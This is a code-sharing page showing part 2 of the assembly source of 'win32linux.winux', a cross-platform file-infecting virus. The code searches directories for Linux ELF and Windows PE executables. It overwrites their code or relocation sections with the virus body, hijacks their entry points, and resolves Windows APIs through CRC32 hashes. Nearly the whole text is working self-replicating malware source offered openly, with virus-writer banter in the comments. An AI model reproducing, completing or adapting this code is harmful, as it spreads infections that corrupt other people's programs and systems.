📄 win32linux.winux源码part 2.txt
字号:
call lCheckInfect ;try to infect it
jmp inf_dir ;and look for another file
cldir: push 6
pop eax
int 80h ;close directory descriptor
popad
push 3
pop eax
lea ecx,[ebp + Start - lgdelta]
mov edi,ecx
mov edx,virtual_end-Start
int 80h ;restore host code
test eax,eax
js q_host
push 6
pop eax
int 80h ;close host file descriptor
add esp,end_end_lhost-end_lhost
mov [esp.cPushad],edi ;write host entrypoint address
popad
ret ;and jump to there
;INFECT FILE (Linux version)
lCheckInfect Proc
pushad
xchg eax,ebx
push 5
pop eax
cdq
inc edx
inc edx
mov ecx,edx
int 80h ;open file
xchg eax,ebx
test ebx,ebx
jns c_open
popad
ret
c_open: mov [ebp + f_handle - lgdelta],ebx
push 19
pop eax
xor ecx,ecx
int 80h ;seek to EOF = get file size
mov [ebp + l_lseek - lgdelta],eax
;save it
push ecx
push ebx
inc ecx
push ecx
inc ecx
inc ecx
push ecx
push eax
xor ecx,ecx
push ecx
mov ebx,esp
push 90
pop eax
int 80h ;map file to address space
add esp,24
cmp eax,0FFFFF000h
jbe c_mmap ;quit if error
jmp c_file
c_mmap: mov ecx,eax
mov [ebp + fm_handle - lgdelta],eax
pushad
call check_elf
je lInfectELF ;is it Linux program (ELF)?
add ax,IMAGE_DOS_SIGNATURE
jne c_mfile
call check_pe
jne c_mfile ;is it Win32 program (PE)?
;some important chex
cmp word ptr [esi.NT_FileHeader.FH_Machine],IMAGE_FILE_MACHINE_I386
jne c_mfile
mov ax,[esi.NT_FileHeader.FH_Characteristics]
test ax,IMAGE_FILE_EXECUTABLE_IMAGE
je c_mfile
test ax,IMAGE_FILE_DLL
jne c_mfile
test ax,IMAGE_FILE_SYSTEM
jne c_mfile
mov al,byte ptr [esi.NT_FileHeader.OH_Subsystem]
test al,IMAGE_SUBSYSTEM_NATIVE
jne c_mfile
movzx eax,word ptr [esi.NT_FileHeader.FH_NumberOfSections]
dec eax
test eax,eax
je c_mfile
call header&relocs ;get PE headerz and check for relocs
je c_mfile ;quit if no relocs
mov ebx,[edi.SH_VirtualAddress]
cmp eax,ebx
jne c_mfile
cmp [edi.SH_SizeOfRawData],virus_end-Start+500
jb c_mfile ;is it large enough?
pushad
xor eax,eax
mov edi,edx
stosd
stosd
popad ;clear relocs record
call set_alignz ;align section variable
mov eax,[esi.NT_OptionalHeader.OH_AddressOfEntryPoint]
mov [esi.NT_OptionalHeader.OH_AddressOfEntryPoint],ebx
mov [ebp + original_ep - lgdelta],eax
mov eax,[esi.NT_OptionalHeader.OH_ImageBase]
mov [ebp + image_base - lgdelta],eax
;set some important variablez
pushad
mov edi,[edi.SH_PointerToRawData]
add edi,[esp+24]
lea esi,[ebp + Start - lgdelta]
mov ecx,virus_end-Start
rep movsb ;overwrite relocs by virus code
popad
or dword ptr [edi.SH_Characteristics],IMAGE_SCN_MEM_WRITE
;set flag
c_mfile:popad
push 91
pop eax
int 80h ;unmap file
c_file: push 6
pop eax
mov ebx,[ebp + f_handle - lgdelta]
int 80h ;close file descriptor
popad
ret ;and quit
lCheckInfect EndP
;INFECT LINUX PROGRAM (Linux version)
lInfectELF Proc
mov edi,ecx
movzx eax,word ptr [edi+12h]
cmp eax,3
jne c_mfile
call get_elf ;get ELF headerz
p_sectionz2:
mov eax,[esi+0Ch] ;virtual address
add eax,[esi+14h] ;virtual size
cmp ebx,eax
jb got_section2 ;does EP fit to this section?
add esi,edx ;no, get to next record
loop p_sectionz2 ;ECX-timez
jmp c_mfile ;invalid ELF, quit
got_section2:
mov eax,[ebp + Start - lgdelta]
mov ecx,[esi+10h]
add ecx,edi
cmp [ecx],eax
je c_mfile ;infection check
mov eax,[esi+14h]
cmp eax,virtual_end-Start
jb c_mfile ;is it large enough?
sub esp,eax ;create buffer in stack
mov [ebp + s_mem - lgdelta],eax
add dword ptr [edi+18h],LinuxStart-Start
mov ecx,[esi+14h]
mov esi,[esi+10h]
add esi,edi
mov eax,esi
mov edi,esp
rep movsb ;copy original host code there
mov edi,eax
lea esi,[ebp + Start - lgdelta]
mov ecx,virtual_end-Start
rep movsb ;overwrite host code by virus
push 91
pop eax
mov ebx,[ebp + fm_handle - lgdelta]
int 80h ;unmap file
push 19
pop eax
mov ebx,[ebp + f_handle - lgdelta]
xor ecx,ecx
cdq
inc edx
inc edx
int 80h ;go to EOF
push 4
pop eax
mov ecx,esp
mov edx,virtual_end-Start
int 80h ;write there original host code
add esp,[ebp + s_mem - lgdelta]
popad ;correct stack
jmp c_file ;and close the file
lInfectELF EndP
;check if it is Linux program (ELF)
check_elf Proc
mov eax,[ecx]
push eax
add eax,-464C457Fh
pop eax
ret
check_elf EndP
;check if it is Win32 program (PE)
check_pe Proc
mov eax,[ecx.MZ_lfanew]
add eax,ecx
xchg eax,esi
mov eax,[esi]
add eax,IMAGE_NT_SIGNATURE
ret
check_pe EndP
;get some variablez and check for relocationz in PE file
header&relocs Proc
imul eax,eax,IMAGE_SIZEOF_SECTION_HEADER
movzx edx,word ptr [esi.NT_FileHeader.FH_SizeOfOptionalHeader]
lea edi,[eax+edx+IMAGE_SIZEOF_FILE_HEADER+4]
add edi,esi
lea edx,[esi.NT_OptionalHeader.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress]
mov eax,[edx]
test eax,eax
ret
header&relocs EndP
;align section variable
set_alignz Proc
mov eax,virtual_end-Start
cmp eax,[edi.SH_VirtualSize]
jb o_vs
mov ecx,[esi.NT_OptionalHeader.OH_SectionAlignment]
cdq
div ecx
test edx,edx
je o_al
inc eax
o_al: mul ecx
mov [edi.SH_VirtualSize],eax
o_vs: ret
set_alignz EndP
;get some important variablez from Linux program (ELF)
get_elf Proc
mov ebx,[edi+18h] ;EP
mov esi,[edi+20h] ;section header
add esi,edi ;normalize
movzx edx,word ptr [edi+2Eh] ;size of section header
movzx ecx,word ptr [edi+30h] ;number of sectionz
ret
get_elf EndP
end_end_lhost:
end_lhost EndP
gpl db 'This GNU program is covered by GPL.',0
;licence agreement ;-)
;CRC32s of used APIz
crc32s: dd 0AE17EBEFh ;FindFirstFileA
dd 0AA700106h ;FindNextFileA
dd 0C200BE21h ;FindClose
dd 08C892DDFh ;CreateFileA
dd 096B2D96Ch ;CreateFileMappingA
dd 0797B49ECh ;MapViewOfFile
dd 094524B42h ;UnmapViewOfFile
dd 068624A9Dh ;CloseHandle
dd 04402890Eh ;VirtualAlloc
dd 02AAD1211h ;VirtualFree
dd 021777793h ;WriteFile
dd 085859D42h ;SetFilePointer
dd 0EBC6C18Bh ;GetCurrentDirectoryA
dd 0B2DBD7DCh ;SetCurrentDirectoryA
dd 07495B3ADh ;OutputDebugStringA
crc32c = ($-crc32s)/4 ;number of APIz
virus_end:
;addresses of APIz
a_apis:
a_FindFirstFileA dd ?
a_FindNextFileA dd ?
a_FindClose dd ?
a_CreateFileA dd ?
a_CreateFileMappingA dd ?
a_MapViewOfFile dd ?
a_UnmapViewOfFile dd ?
a_CloseHandle dd ?
a_VirtualAlloc dd ?
a_VirtualFree dd ?
a_WriteFile dd ?
a_SetFilePointer dd ?
a_GetCurrentDirectoryA dd ?
a_SetCurrentDirectoryA dd ?
a_OutputDebugStringA dd ?
f_handle dd ? ;file handle
fm_handle dd ? ;file mapping handle
s_mem dd ? ;size of host code (for stack manipulationz)
WFD WIN32_FIND_DATA ? ;WIN32_FIND_DATA structure
prev_dir db MAX_PATH dup (?);original directory
virtual_end:
ends
End Start ;that's all folx, wasn't that kewl? ;-)
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -